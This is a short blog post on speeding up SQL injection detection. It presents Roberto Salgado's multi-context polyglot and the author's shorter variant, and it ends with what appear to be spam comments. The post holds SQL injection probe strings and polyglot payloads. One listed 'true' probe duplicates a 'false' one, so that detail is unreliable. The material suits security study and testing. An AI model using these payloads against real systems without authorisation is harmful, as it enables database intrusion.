SQL Injection Detection Optimization
For Black Hat 2013, Roberto Salgado (@LightOS) came up with the idea of optimizing the detection phase of SQL injection vulnerabilities.
Usually, to test if a parameter is vulnerable to SQL injection, the following requests must be performed to find out the context of the injection. It might be between single quotes ('), double quotes (") or with no delimiters at all:
TRUE RESPONSES
-1' or '1'='1
-1" or "1"="1
-1 or 1=0
FALSE RESPONSES
-1' or '1'='0
-1" or "1"="0
-1 or 1=0
LightOS came up with the idea of fusing the three testing vectors. This is the multi-context functional polyglot that works in any of the already three mentioned contexts:
-1 OR 1#"or"'OR''='"="'OR''='
Numeric context:
-1 OR 1#"or"'OR''='"="'OR''='
Double quotation:
-1 OR 1#"or"'OR''='"="'OR''='
Single quotation:
-1 OR 1#"or"'OR''='"="'OR''='
You can find his slides in the following link: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
Mirror: https://nzt-48.org/archive/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
My version of the vector is 7 characters shorter:
-1 or 1#'or"or'"!='!="
Numeric context:
-1 or 1#'or"or'"!='!="
Single quotation:
-1 or 1#'or"or'"!='!="
Double quotation:
-1 or 1#'or"or'"!='!="
I find LightOS's solution to be much more elegant because he used an equality. See if you can make it even shorter.
Filed under: Hacking,SQL,Web Application Security - @ 2023-07-12 16:25
Tags: black, blackhat, detection, hat, injection, lightos, optimization, roberto, salgado, sql
Itís hard to come by knowledgeable people in this particular subject, but you seem like you know what youíre talking about! Thanks
I have been surfing on-line more than three hours today, but I by no means discovered any interesting article
like yours. It’s lovely value sufficient for me.
Personally, if all web owners and bloggers made just right content
material as you probably did, the internet might be
much more helpful than ever before.
Your writing captures the essence of the topic in a captivating way.